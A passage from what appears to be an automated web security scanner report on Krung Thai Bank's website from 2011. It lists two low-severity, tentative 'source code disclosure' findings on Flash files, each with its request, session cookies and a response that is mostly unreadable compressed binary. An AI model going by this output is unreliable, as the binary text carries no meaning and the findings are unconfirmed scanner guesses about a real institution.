......qq`B...O..2.Mw..p.....O.%.aKq.......?l....P..gIr.S:.:^e..........v.E.W.c..._4.`....>{..|ngp.4.z..z.\..do+%.G.......0l.'..#.o.%...6..........Z6R9..X;....h-...f.{d.....Y..n..Hm.S...%..rH8.......i...rH......T.P.<.!.0..t4.;46............$#t.1s..y...+SsI.r.S........!.;s.-7!p..    .....C3Qg..^.ss......z...G.L%.T....;..i...Lk../O.z&..)...........S.v......4...;.i.8>...!../..=./..r>...H.~....O6c...33.C..V......a.%....N[~N..eeQ.m....1.......6....%.+y....g.B.._R.^KR.....(....d.......m...*)...'].#..Ya..17..9..0.A........V....V..*5Og....j...L.....\...q....2:5....\&..Gf].e.P....
.z..s......./...N.C.j......@..[..f....(c    .2.V..Mr9v.b..x%>
..5..<.H.:....rh..<...............{m..}.*',..(....=.b...J.:rp...6>
...[SNIP]...

18.7. http://www.ktb.co.th/flash/f2.swf  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.ktb.co.th
Path:   /flash/f2.swf

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /flash/f2.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:27 GMT
Content-length: 75331
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:51 GMT
Etag: "12643-4c723a2b"
Accept-ranges: bytes

CWS    N,..x...uP.Q.-xqww.....vo.]48.....48$.].....5.K....7.....z..............Yg.....:......J.......a..........<..H........Y......../..........l.;.)....@......m.6X.$.........k.i."<.2"<<
".:*"".?.......
...[SNIP]...
3...cs..z!F .ho^...v.R..^....0p};%.am}....>0.D.T....DQ..u...x..o..J    ...Z...7V..}/ ........../..T=$..2 ....R....6..H..N.Ls]o.|E.\..v.o.f..N..9...Bu.C.U....)._F)....jQ.. .^Qo~=.%..v.....M.-h......>.*`..<?.....yy.    .......r.~YI.._...y.tJ{;.........#6...h..w.*..F.......<
...^1.9.iu....:...^FT'..M.N;...........,..~8...g..y..G...6V.E...d ..h...&_uIU.G..E.k..2..?U....b...o.a.../.... ..{.(.l.~...-.pQ..oK..w3.P.+..`.....j\(...R1.j..q..53<..6..Z]../AE..".c..5..)...Y...!H.e!V.s}.N.w$........Y.c.>rU..x..0[....v....m....h....3Y.....E....x.`S.../o..UR......... ..e.a.a.`.......1J....H..i/.B.\y?.|..0.._.H...O.P...-..9..#...o.'.N4.9....p..... .gEOI..9..    ...A>x.`y..../Q;...3..4..'d.5..%D..ip9e...q...J.Yo?....1{...T.f..c.d.......    ......j.7J..w....?}h..,.y....w0.0a7.s"l......-.#..06bg.l...v...y......_1iZ\.@...(A;}......M.H.......ANS.K....%+c......U........*4vw.-N..........,[....U...?.y.k..U.:.........*....<..>8L#n..ap.....4N5I.............;.I;?0...iB..#.%.!......&..Js..G..[q?...`..R@F....~V...'. ]<..-..<2..Uy..D.#h.q......I..o`O... .a..c,.Z...{.8....`Y$.M!........7".Z./......A.o....'......p... ......15:..g..sO..x.Glk.*V....z.US...T...j(...u.|+.R.k...c$;\C^'..f.I...Z @...Y..._.R..k.S h.w.t....GL....KJ..?....@..]....k....)..b^mb...s....> .[..<-gw.5.`......~n...B..{.....d.M&t..f.D.x....S%t^..'.g.)....8....2.x14aR.....w...i...E5..%..........    .[......O..M.....'.w    .....[..e...uMmT2k!..G.......Y.p........HT....d.9.........jC.i.1....a......)..e......A...j...,.X...%4k#...3......(....>.....(...^.(..+...t.Xy.......zf=g....OU..K..-h.=...M.......#...F%....C..;..%?    ..t.G..f..).)........?..>]....*|[.    ...C.E..t...X.v.&.2Qx...Xz69i.p......&....1..........jD..>j............./U.9.t_8.5.......Z...?m:....AB*.l..z..
..;......3c..bX......M"..:..^CU..J..*_nw..kxsz..E.C:.gJ..$..k..........k......D......8.R..%..........{.........5Hv.j.......h....Tr..X..c.5....P.!....4..I..    y!...P.\$......Eu......j...byRIMx......#.pfC^...|...C\:..x-n.......<7..Y^+....B2......j0._E...@.^.:..$qw5>.p.H3.{...Y5....F.....~o\....{..F...[g..xD..}........u....o...c.........W....k._qJ...a../......l...d..r.fq.z.5_.v.."KzGE..........v.........Y...b..f.a.ht.Y........&oZe.G...T..M)X...;.......... ......An.J.D^<=F...%.K.........Z......`y....u..
..].........3.w.AZ.-_G...;._..Q.S...h........O3..c..Y..kZZ.........+#.~..KN.w.vWk..`............W.5..D.%.
......Z.K.9(    ............I..X..?.y.c0.m..w..v;.[...?........n.f.....i...F.&....l\.&....<........B....Jm....[....X.....X.Jd...\.....{..#.T..r(...E.s.....<.......s#.uh..    .U.....]_.v.X.......m....3...K....t..A.D    Ep...G@...I.6............q........P......u..U.K.8_.=.d..Gr.hO.4J.bH..J........X.........0.rxgp..."(..q.....htmV............Pa....@..k.Z.....!..p^Bb8    ..|I..3l7..+.........o?.K1l..|.....1...Je.b}........]P....V......>...?..x.~........sfOU.@|.T8W.;`...a....k6.x.u..-.e.....;.iL.%..u...aQS.......\vSeF. ..R.`.r.e.....Gl..Np........0.!.].......Be.[......%
4. zY6....e....8(.E.{..v*./Fs(..<3..0c......+.W.X}}....N..$W.}.u....Zs.......=j|Se.a..z..C.5(.Z...Zn.{.t."~yw.WQ.2tr.[d..U..R.>..J..2...r....#7....d........z    ..#?....a.......:~Fd).....Fykm....Rd.^..    .XP......h`.b2\.....J    .a>I..N....D,U...w...i..!!?.<6H.@c...n..i..c...bQc}.....F..p.K.O.U..
p.J...........n(l........V).K.[....0.v.....t.]x.... .~.......u.c....2_..6....3..u... ,.%.J.'!........C....D........T.%... .p......s...L.=&R....
..'l...J{..s$o]..uC...3.:ko.....2...1...S....7.W.)q.-4".:Xs.t....G..2.e..Y5.O.%.".C.G../0..](..-...m9;.Cp..#.I.y....C....Y....[.*....F..............;.c.o.Yv....!A.M...N,&.N.;.c.......=..A.[..w@...;`....Q..k.C./U...u%.:U.sV='..o...0..~'.B..^...../*AE{..<...1.j...-
....J.....'..e..........Y.....#..*.........<.    ]....;`L.V=.[.a2dlD...j...F......K..fG.n3W...>...8.M.......?.,m_P.j=^".....+...I.<.........c.".jM.4.....a....yY......H.fN._H..-..f.a.(d,........D.,....+y...}...".G..p..r....6CK$.{..gs...y......'.....I|.BJx._;...k.%..u"iJo.Q.]$.k..F...E...z..G...#..xg.
./..kC..o.=....#...    .*.m....."....4\3&..j0(8..P _E9...[OZ....Va...I.s..3..[<2.A..?....h...d..$...?Xg......g...o...3.=.........$..m....jt..8.k...7.........T.]...+.....[.....u). .8~\..-GE|+......zA.*.w.*.0.6.h..VfC..*....f.E.f.[.6D.u...g.X..(.....o7..n...J....g.E^...d.|.ez...Z.Y .Ub....<....T.X6....z.&>Px...+.%....Q......D.@./..]...`r.T.
.{....]......8...'9.+g.X.y.....`V...Wai.....Y..U..4....}@.|D...I%@.<..R.Q4.x.c..~/i..>..!..........
0..a.c!...#...cz\u.v.U.o.>..I.6GF_....:,..(..2..    q.\/B.Q...M.}....
.....g.T..........A..v....`.....#..'.. ....;A..{RL.^.o#M.IDDv+r.......V....L......t.0.....N.....).N[...Mz.
..9..Y...y...n.5!..v?f.....    .$
...wU....7P.Q..."..X.z..M..qZUr...F44.(..mWj.(+\...l...]..-..o9j......2tFB.^O......KJ-......y.....h...?q...    `d...X.&_MJ.....K....#..8..Wo.f!.......Au.Uj%.Yl..PO..U...H..!.v..F1..f....##...R..!.'.....%.f.j..\Q....R...$.3e..0...LY..#..g..J%...f..n~=@v.bf/.... .(.(a.W>..x.g......|.4..a..U..N{....
.h.iq:T.&..Kq.JQg..%..K.%sDh..].e.t!....%...P...<.id..l...J-..l6.7    ;$8.<    .. ic...)B.8_..h..9B_l....#..GB.E.tE.Oo..Z.....N.......#.....A....nOB.....9..A...:...X.%D....l....Vg.:...K...YH...d.P.M...:G...].g.&.@ .#..Y..G.....) .<\.Q>.....F.L.H...6:k.w..D....q    I.h.i.....K.).F."O.X.@.;h....H..{..............N...(n..a..F.=.5o.H..=..R.,.....:..!`..E..V&.g.......|...z...d.,k.0..2..f.Mf.A8..K.p......Ek.5..7....~.$%....Y:.Oa...n.'..).A.H.........T.1)H.h.F..S...:j.c........3...D.3....h ....3........d....u..
.m.."".....v..oLo.(P6.......,....kU..s.O.....pZk..;.}1..4h..X4eJ.u....E.D..>g]Td. =$........~.3D\R.}B#.a..[Sv.i.,O........<.......2..N.P......mX...4....H.........l..u..s.[.G.#.m..A^..........:.5/..2.*z.....X>z.E...8.U:X..u.e-@.0...p.....n.=.....P.g    )).or.3....qc.....*.e.......lC|..@.&......T<<:.-.G..w@RA..'Z:5!...Q.t.    .v.L.?q.......o....8a:......... n..../....7sm....q........l'u    .[..I...+....V+..Cmv'...".!..!. \..w..y.c.....3>..aCg..|....S..&/Z1t....p.9.A...1K.$....@....Z...).....K@%C...G ...W.Jz'...2..u....
.$..y.....(K.......}.x.. ..*K..3Mp..>...j..N......$..../..u;.70.,].~.Y.A>....y.Q..H.e..U....2..:..b[V.,.UF....#.$(.QO&..c......}..<.YJy........#w...=..#...u.s..+..p@...p.....9....#M]..q...@<J.c..B..oiH,Wf......0&....q.+T-P....j.}4..v9:.......J..Q~.r..z..7......@..D....i|...EW....i.3.g.~.........Gh.>.7.3<)+.L..@....}2...'....X....:gT......FjE.=...G.v..z..vd..`.....6W..W.COD...(.=..J    .c...(}..6........4..!....l....V.c...&.m.....P.i(..}Y....j.Yk..../..F...m 1(........8.n..(.7..C..t.qjRW:.
...f.i......,.g.S......`.g%.[...%c#S.R...F>da...o...H..2.*`'h...I\.......4z..)...._X6.[..U.V.....g.(tW.$|..H7..S.....ji..(...+..{..........0..........c.m..{R.@...J~i..(.]...C.Sp/2u....^.C....Do...XPA.w..s.9.....O.n...1.M..@    ./.y.o.....^@1_@baa...c....i/.......)......V..!..1G......\.._Y.sh8..<..Z..{%.z...]R.(.6z.oZ..Z....Q'.c.....j2.........!...G.?.4\.v:7U.."_...r.d.D.HR.q.P7.B....C.RNH....q..%...Buig..@.g...ej......._.    ......d...R.\..=.n..5fI.r.....X.L;S..:..|.G.y...*.8.V.<D......P3......?...-"=:&)o.F.3f...O../...S/...%t%j.1.sz(..&6....k.......Hm)..nH.....*u...`.Z.+z.......S.eWQ.b..q...[...%l.!.$.NE}[..d..Cf3.1.q.    '[ga.K....p.=,.u[s[..(..... }..).$.;.B........3.]E.,..\%.%.*.E8....#.kV.V....ATm.*.U..J......k.Z..X.....@....\.....7\..
e7..J...........k53..*    .}...<w..i
.m.{*_...=......w].:..O..f.?.!d1..[-...(..u.psZ.*o.Y..O..]J]v.?...(    ...z.I...
.x......f.G.:U....B.$.M2.5.t...<.........&)2J..g......6ET.5...%P..]T.5-.+.?G."03...Z.*..
.....o.3.....y.h6    4B.IH<p|...W...!.V...#.!..t..N...B...{..E62    ..5!\n\.....0.Jt....3...o...7..    .S..p:V.r^.`P)....GQ...W.B5.v..al.X
.Iy..(..L,...^\..............D.q...q......x>..L.N(.mR.T.h.T...".........y.RD........K.'...g<.=|.n'......zHA@...p.F.Tc...,K...Z..mT..^..b...ir{D..r.....P.4b....R...yOE.w0k.aw{.K.K.O_....g]....R,-.    >|3j...LH..fV.>b.......^...<1...(..l+..-..].T*.+$...Z......Y.:LB....q...(R.<..Lj;.%..z..e.n.|.G..'CB.X.Uc$....B...#....z.Y.l.,..#..A.W....+me_TI
j...XP|.....5er......#.G3Z........s....*`..>-.0.-.........X....(.....W.}Y.bij......%um".O...............v.D@{=&.V.Y[..W+g.e@........Z..S.....%..a..>c.^.....
v...    ?..`..B!./d    ....O.o..wa2.j.z.....M..v.XA/.......R..]..d.<.JO..{...~.b../K.C"!.-..r...jZ.......Y.........R    ubD.8....G{v<....l>.G.v.Iq...: ..gQ.B6Q..6~.^.E7.].........#...]..W<..bY.A4K?...Z.t.....
..s.,*"x:..}$..O....L.8+OD....A.5..A.R9n.jo...a.C8d..8....>... ....8.~oO.$......].^../.-...*....u.....>..y...E.....8...C...(....x...m...}p.}U..@$...(.L.$..M.G...>..J..P.b...J.......@.....O...V(.0.9x.n..=...!...X........cg[.Vv..T.u....H...:>._."XD..".`v
../.......o.......k.#.X..O.U..b...o?.=....8.|...SV...:.p.J.0/.9.^Z...(..?.-.+.J{..Q7...F...gW...f.a..Yxt...M-$qNc.........J..:.J/....\eoR.8..).c.@....H.T.7.................+QNI_D`l4F.).....d#e..+.R7....=.{
>^d...r.......B.Gta..p..f.....T.Z5r&.m.ax.....dZ....i.u..na.Ug.oZ    .K...n.Cz.`.........5d.Y...Ui..#.9.J..6.VJ&v....B.....d.BjGk.'.@.?vA....L........-8M.<#.Z.<..N.a.?.mI..Y.r.7.....Y.r....\.;_L...ui!...^...q..PscW..nDi..(.6.`....42.mpe.eZ#......I.....Us..m.aoF<...RgAaTf....s#uvr.G.e.D ..1k5........$..].....MS.K,.n...kN.=.....|..?.g...S..[.65..v .....z.0I..7=...].".W.
g-.1...G..P..n...5..........xc...2......@....j..6.;R.N9...V...!. .@`...<.p.....&EH.x.T...A^(M.......0.i...
.*.q.Y.<....9MZ[i..b.OD...3-..$}.=...._lj.=.j....o...wvN$..6'd...z.S.Nr....7lD.S~.m....p.2...K[.X.4l...|E...\.v..h.Z0.....V.....D.i.'.nhl..R.s;.....G....-.I...m.;.[.!BS.LP..q......HO.N*...q...R...1`7N.r.......\...........e..P.)....$Y....7.t....&..<u....W...5..T._...    RS....1.N.....Qw>...4G.<h^..>......W.Dx.t.].B..)(.#...H%..X.H.;. z.......s0~BBF[..,+.m..K..M@..E..Y....)...fXJ....y.".b....R.\N.3..<....h..+..
....]".|..a.`-.....ah.....De.|re...:2.kTj.ij%.j%...D.\...N90.W...u{.d.'48e    k..zw...B..<...C....>.....P
.]....2.D.....]1x5...T..@F..9........O....).^.z).c~uUQd.2..8w...zLUY...Ii.V^[....c.B.J...t.fG.Q.M..<.W.#....+..?........&..KxtR...s..=    ....Xr... ...gH..L.8.~.?*]...~E5....C..Y.8...........l..#F z....`u.....!.......zZa...h    v`R.....2.S.......
v...I......<....j..^...B.....2......._l.....^.>...3>...C0f.......@.....m?^g.-+...lOf.d.c.......$)X    fF..xq./..sC.....
.|..<bU.....+.&..A:[k.p[...Q.P.qo U......D;!.YH&.~2.p...E7g..<o.O*..$.
T5.+V..^..P.\D.v.&.:.b..ek.....).2x....%-...Vx.L6/.,;.*.....,U;.........B..L../.dv..f.8%.}...S
..R....[.E..Ck.C....$...s...u2m.R&..K...U.\.q..KOo..Bs..,.hLm...'o.E!..).}\Cv........tJ...U._.    .[.z?.3U......~.F..q..<~$.`...D+    Q..y..\.%..0h....it2'..I.<$..../    .k..1..Y..9....4....MD}...oZ..w.M..)1..S.xQ.....GW.{C.$.T...h..J..w.|.....T[e....._Xy-.u`.H.q[$U..|y......e...W.::........h....*.Y.Ps.|...nx\..3.3.%....l.z..;....84.:.V9g.C..2.1X....Ka{.Y.Q..k.y....n.'...d?..Q.JJ&v.L....~_|.[}]..)iX.$.U.d}........x.S.5!Q*s.....#.Gv;...#._.].K.).F...3#.I.j..j.)Co.?'LY.a..k..O^./.&...JK.h.Ya`Ca.*(.U....6.....;...-^a.    p?$.2.m.a.Yj.,....ke6.........../Me..].X&a|tk...o...Mw..`5....j.+.o4......w.xj..zQc.\V.l.|.]Y.~....q........D..G....$..0(Y.........o.O..-..h........."{...|.    ....    u3*..2,..\.|D.;FAv..U...I<.0...$r#B.Uf'..%..CN.A.9...\......&..B...%?.K....%...G......|...'(<g...o....q...\.;&B.G]iW.(n...pUg..A..C.}(..e..!FO ...E...t..*..Q....].3..#.....:}W...(i?.I.......I<..oS....Z..n4C{....[.D$?>
..q.=.....[..PA[.../............U.Z.O._r.+.    P.]..z.O.....1...4.ou.... .N!...H..av.9....ol;.....qj..L.e..Y([{.;W...5.l...-.m%.7...X.cC...OM.M...I...I..Y<._...Rf.rU.us.V|.4.. r...w/...t:?.7....).....]..
...[SNIP]...

18.8. http://www.ktb.co.th/flash/home_show_flash2.swf  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.ktb.co.th
Path:   /flash/home_show_flash2.swf

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /flash/home_show_flash2.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:07 GMT
Content-length: 671163
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:07:10 GMT
Etag: "a3dbb-4c723a3e"
Accept-ranges: bytes

CWS    ....x.t.{<...?^..]*w.TNu.K..$.as.J.B..9.(....l..%9U.r.H...3.U.#..3.......f'.u...........\.......yz..f...k..|\..v..mk...S(........5Qk6(.].....k.w...v..n}#...j.N.7....zc...5...g)E.............y..
...[SNIP]...
<....W....E..D..xq...z,......k.`.I......(.j.*..1c..g.$9....A..tE....NI..g.X..N..)...10iC&.91.qF.=.......J9.....O....+..g......{...J$..8..k.y<%.C.B.{.,..E.3.27...A.h...\|f...KU.....M.4......bv|....6......S:N..\..d...]654...\....7.Q`.)H.IG.b...o.y.o..\....H....zN.q.T...."...6w........8Q|.d^. .y..oX..    Z..Wj...X.qI4.R..h..n.....k......gz........Z.c......$.u...:..........,.D..%7..^..%>D4...v}{5?.?.>
...[SNIP]...
<.@,=B..6..@..O..\i\.....<%B...............(..&.\.X*..r.1.}..P..I...8....m2BF...-.SMB'.............MNJ.y......r.S.)G|_l7.f.W.hIN....
*.r..........\.....5.....\..>..-Na..... ....Y.)...{...|.z..y.P.`t026s.#.<..c.1.i.P.....~~.#*.J4,.uA.s..j.mTg..E..
..Wl..(kbYq,..e....`..s.'...
..;!.e...4w"q."......qYm.b........_kB.X....~.b@.....C...M.....~.DH{...L[.&..E8.}..B..n}../z.=pj_...G[C.b4....M.Rd..9    .f..Z.A.H09..,.....$..6.F.....5....F.J6W\....
8...d.J......S.....j.'........t-.-.+.i.t....Z.../Ch./ILd\^+G..{...w..<z....r]./'s..._......[V..4.F.X...7...Z^.k..x=z.6..xg......Y....?.X.....?0.0.R...q$y,..EM.0..../.|....P.P....T.xO{cy.o+m......:..-.`...-..@.G..r...U.U3.....k......Y.p`)........;..f...Wm..aA..C..F.QS.R...-YCk.R.TF..T..........2..../Tet..".l:%..9......X...^...-@.Gu..U.QQ....}%..}+.......:(    .......[..&.T..#/.bDS..'.u.... ]y`p.?SZ.;...S\2.?......h....`XXgU.M........Arj-n.....S...0...4@-|..1+...&pv.@.C.Lcw...`...^...=...4w...W56....f......].G...l}]...W...t.....O.....'..../.c3...tu.
*]a....V.v....9_..........ZNSZ.......e~}.t.V....c.[G..F..p .....%....c=..Bc.hu~.o..$.......5..9E..T?..U....b..sk.8{......(...j.P.....Tl9........~*|...j..d.......<.0.Q[d.x.V...*.B..}M.D.dn.nc....&I......]sxq.7...2....5....=:'Z......1,!........C..k.....(......&.q...yr...K.N......Kt;x...g.%..&...+L$P.....*G..$.^..&.F...@J.R......V.6.A2.N..}.K.H.S......E.......q.."..M..........3.2lJ...\..$kz...)s...:_..TS...6..`.....N.Q_.<|..D.n.....Y.l&u.:    ....i..8.<..X@.....>p...4.."hh..x.^Q.Q....J...........4    (...*Ms.oj..[..P.{.\.*.>`Rf.[a...o.;..;a.....v..Y..>.Ly]9.~.d....w..5.......%..h.}L.......@7.........U[....A..].wu....~.;}.c........`...*........}]..........#..SA.O....4?q..t........;!....2/........:. ..    &}    ......%...Tn.C@.........x...3....B.M......q..fP".. .O.c..
.?.......ig..ZW.....}Q".GTO...;.t=.......@L...+.a.%L..-...........Q9..].)......1.J.Z.N...oJ...;h#.>.V.k/!.Z.N.yX......{X.h.h..YpN/|.l]..<. .;.....]...;j,...U.7.u._.H{......d.....;.7aD]...j.....hwv..{..lI8.+h...y.tx.....Gt~esA....._e..\@...Q..b~..Ceo.:...T..z.h/%. a_...t-s$..A.P.+U....j[.O....LsCT......`.y7h....t%.?zxcr_....{.|hB.0..v..
...L.4Q4.....QQ.K......T.X..'=.OS...f}........}.u......WK.D........n.tC...2G.B.Hh...<.i...F..g*a...va{S.......)%.,..q.e;G..........u.(.W.x..u....=XI.%.km.....x.:...,.^....@..o^dr.A...StH...NfN.vy......r`...-.... .wg......E....@]S~...Cg;..N..e.f.7A.}..i .76.e...l|K..U..q.'.;.c...j9i...]z..hM.Y.........].....ii..UG(...jv-m..;.G..$'g.9G.`....s....'....T....))...d..ow;..U.....A.e.....C...k.I8.A..@........c.^....F8.....H%b;..k...N..s....@..S.h.S...K.<j.........&[...
.p....8.x'.Z[.aN    ...9.5...\_..<.v....Z.r.......aM.4...d.T'.....?.m...m..L..Y3.7.O..K..Z_.o..A&.R.&.\...b.I^Y......g..
....j...9].C...
.
.._.7.*.].....H.Q..:...*..J.m.....N.~.=...K..........S...nF....q....El...!..*.j.....]..6.../......<.2/..:*....a.5."m....}...O{S72.............A^.g.....^....c.).F.m.o\G..    9.[3.#...7.R0..%&9..@..[...
7......=....;g..<S.>..c.Y...@.H...?Yy.z
.i..Z].lTgY...c.9YTUW........".n..N....s/r.}.&...7J...7
*..$.......4..S..m~N....3.4.cii^..........S4.d.....Og~...Qw3..)..<...t;.    .ez.&...{..\.9......Bw.c.Y.a7.uHk.N.
.6.$._S.!....g....h.}/....!H.{*.^...G.........i...Q....
.{.|D..m.T4<E.,gR........c.u~K[U./Y.l\%q......6=K:.m#..o.px?..t.. .w..D......P..Z4./:...@.5e...!\Q/..........|.v'.'/.....D.._.P.Jt@........x.#C/.
..=p.#%..+..D..B.864P.M*.Z.AP7d.y..&...Y..........r....I.rVX....ip    .L.../.W.r.>.J\.....+G.x....OV.k........@%=Nx.N.}'0....r3[Q...\.....W..np.c....`.0)V3.>%{....../.6...Q.v..K.K}....*.L.....j.....*..=.(.....%..$..oV.~mZ].0`.a8.9.J..>d?d2.:P.....O.d3..Rf.6....%.$.....a... ..m.......ec.....{..f......4..>9.u...;..^...../...u.M^.|...>.a...6..L.W.....*4.w.}AR.6....=...{...IN......D...!.e=.e_....s..[.Z.F......+n.t...\...<Z....9V....<..?.....~..!..2j.....+.....oLY..n0Xc.G..."..6.~......{ZV...X.7..F..8..=J.|...7...b%B.6..G..0.C.K.....L2...........&...J\.u.U.......l.<.5.wH3A.........+.....<{Y.E....H.!..'.........}9q..t.>.Ws..    D......B..a.*...P.... .<(6s.n.a.>..:1?..#.u1.mH6yo.........,o..    .r.....tw.......]/.Q.4..
.b..{....9..#...#j.nu=....K_.#......m...6..r.rH`....U.0.n.p#hm\Y%.H.........._...z....ge..B..z:.{+...$....Z..h.&/T.WkZ0H..|..l.z.}b....9/.....GFr.....^.G\q....7...;....{.UY.    vWV.hz..])..`.u.A...W...r%.1o...r.P.{$........;Z.Nj.bv.f...hL4.{......7....c.0..6l..p.......b.R..
0.....-3wF...Y..Z.....q..8.|L..5....<|...=.e[0y...sy...q$..t.....Z.......m9..in|}.B.c_.....$.Z.~.U..`....X..    ~...{........k........nS....|.......v...X..z.-'8.s...&&..X*'....+.$..p.[.)..X/_.......b........n7....<....D.J@.-..eB..n.J.F...E..,..t.~|Z.N....{U.6.E=...#..j.o].e}]+!;..od.wJ..Q.....fzgV..O.^...bM.....i9.....9."p.....7 .......A.....>n@.a4...^.+]...].k...Q.X.fod..C"aJM.    .u.....}
....._..fOr....+......v..(....B.wPi..&Z'.S}.I$..>O.`....C.S.=.#....k.F;.G.e:g""......;B.l...q:..5.k.D......0..d<2.^.8...W:.......h<....b.wy_.....,..7..|..^({|.F%...Lh...A/G...($.!.........~.)..K.MH....>]_T.....l...y....>}.1L..    ../..Y..Ts..X.M).X...B.t.>P.>..o...................I..Pw..e......]...q.T.)Ny..J?'..I.......th...M.`..m^0.:.2[.S]..H[...,w..O.:......9dF.M..vj......l9...z|...X."9......m.!E..d3.t..aF.I..2.XE%.9...... W''....}.]C...^(^..-rZD.....T5h..m.w6..}:(.e.&.Y.F.B.......#W...j*..,d.0.cI|.R:. ...... ..I.YV...ZP.e.<...1...N............n......{.#......P.R .*.0....:...|*`i.}......j.E\.._t.?..Kj.l....Qj..:.Wj......&..v....F'..5..zGv...".[..J.W......RIO..TL.'.......>B.....C.h.........[..._.2......C(Q.U...}......j...:.../.U....    ...y...o.W.{U.N..o.
.......J..+.#jJ..A..1...7.r.    .*tY...~.....?i.`..........j/.i=.<v.C.y|.wa....W.......C......].L..d}.53)[..+.dD..k...snd.DX....(...j....b~.....7-...*.n....
\
...;*!..C3;...>..ey] ..un...f...W.r.b.5.c..R..9G_.K....[k...).$$..w...b.....a."...&.^..    ..a.|...`.T4^.....d
.\..w0...on........~......m........VzL..R._$....2......................=_....
......`.?..SG.0.G....T..e..x......q..=b....N.R.......V..l.*.....5...S....Q1..$r).~5.3.(cq..57.<z..u*h.v^...B#...;n.ogm.L.-5..U..F|..4y~?.......KO:g.)..d]d...{.....W.......{............s.....>WD@.,G..;..c..F.FlB.....x......&w...../XSE....y.(.5..-9.9.j8!.8).sWm..gt...,.PAzX..%w.....{..z.@v..x.A....k..o>...:..V...3...747].%...R.&.X..U.T.r......t.E.I......Y..Q{..j...*=n..F....%.,(..l..(h.GY...W....U..t{qxo..q..P......H......N.N.2|...._(....~g....$#..M..}.`.......6}.$..[..o...........t....... ..b..
.H..k.n>....]..K...$n...:..E...*$I...FRP^c.j3F].p.c....u.q....f..iZH~B..T......z.</........._....P.;.8..P.(...X'.....HC..;..Qr..._VN.j&....m..,......eb=.....i...aA3.t!..:c..hW.rP..h.z...V.t...s....fW.{...f....C.<...|[K}.p.....!j..mh.....<.>.9}\.=.l.6..P+......hj....&...n.ex.....
.W..    ...m..O...i.
....u&1..G.....A(b.....
...x.x.k../.S..L...M^0^@...J...ma.a.iE.hC.P(.V.1..@-W.....EZ....r.K.ui.N....~......1..6.
.IG.C.B..,... Y@v.".n..<..'.....`l.hT... cF.n.$.c...t-..Y.O~.....[7..|..)."......jN.......
U..2?S/..%...M"EF.&....././;}.8!.......13:2ePq....n?r........M.S..)_.{.{.....]D....c...#.Fu...R.+. %.......)......95...gt.w...O..XI.....@.h5.+...'5./..f.:..`.:..T..u.GK4.......H.&.Gu.k..r5Or....h.x(l...;.7.+_..6......kJ{..G....._........;.O.bO.|._........7w..D..C..!..I.;.....xY.......H..%.    T,....D"..1../f.^kdK..:'.....6..K/.....":]sxx..t.k{d.w....#D....?U.O....n....|.RU..}id?.e.%=G    ..8.l..*........Q4...D%M\.U..X:a[;..9...`...T.n<b......_.~.q.J.V. ^YN..ACx.    Z........~..Z..ur.N0....a!F,.Z..........[.U}...>Rj]]....<..n<Wd...l....c..g....r.V....Ie/T....9.K.4.......{"6.K...Y..p....~..........?:v..j.[Oti....A....W.O..nlp..+..y........_.3.=QP..Ok3...84..SU.;.t..>.r.k.W.....^....KE.E.:.o
O....4+..I.;.w..@
..B..k......._.....5..8.......
..........7.y.l9qw...-B..6N.c=;....7d.!......~........w..AA. .(..F    .^.>.y..q..XO.....x..
Dh}.2.......]m...Q.......f_u=.4Q`sdq.>hN]...V_.5..[..Q/....B...u...{!..3..B.z..rPdo^.....0zC..V..0.s.g....!.]8w.vp..KT....+..'...k...6...M.>....g......Z.......?...^.|w....n.e.\#..o..I..T.(......./.G.@;....wq..7.s...W{......+wL.........)..9?.\Y.....v..7.....+...k....O.8.......\...sJ....V.h.i..W.].......|..j.....0..G.}.1.........F.....$..9....G....d)b....u..Z...B<...^...y/ ...dJ.../D.T.M..._..$...Tu.Y.g..W.... A..qv.MI...,.p.p.t.dZ..4rZS.....\-.+_...U.x?..R......\...zb...|..B.nB....oTJwnuK..j.t..A.tnV......1>.......w.i.....4.._.J.m./.....D...}..h...\%........B}..W.....e4...u1..../_<A...
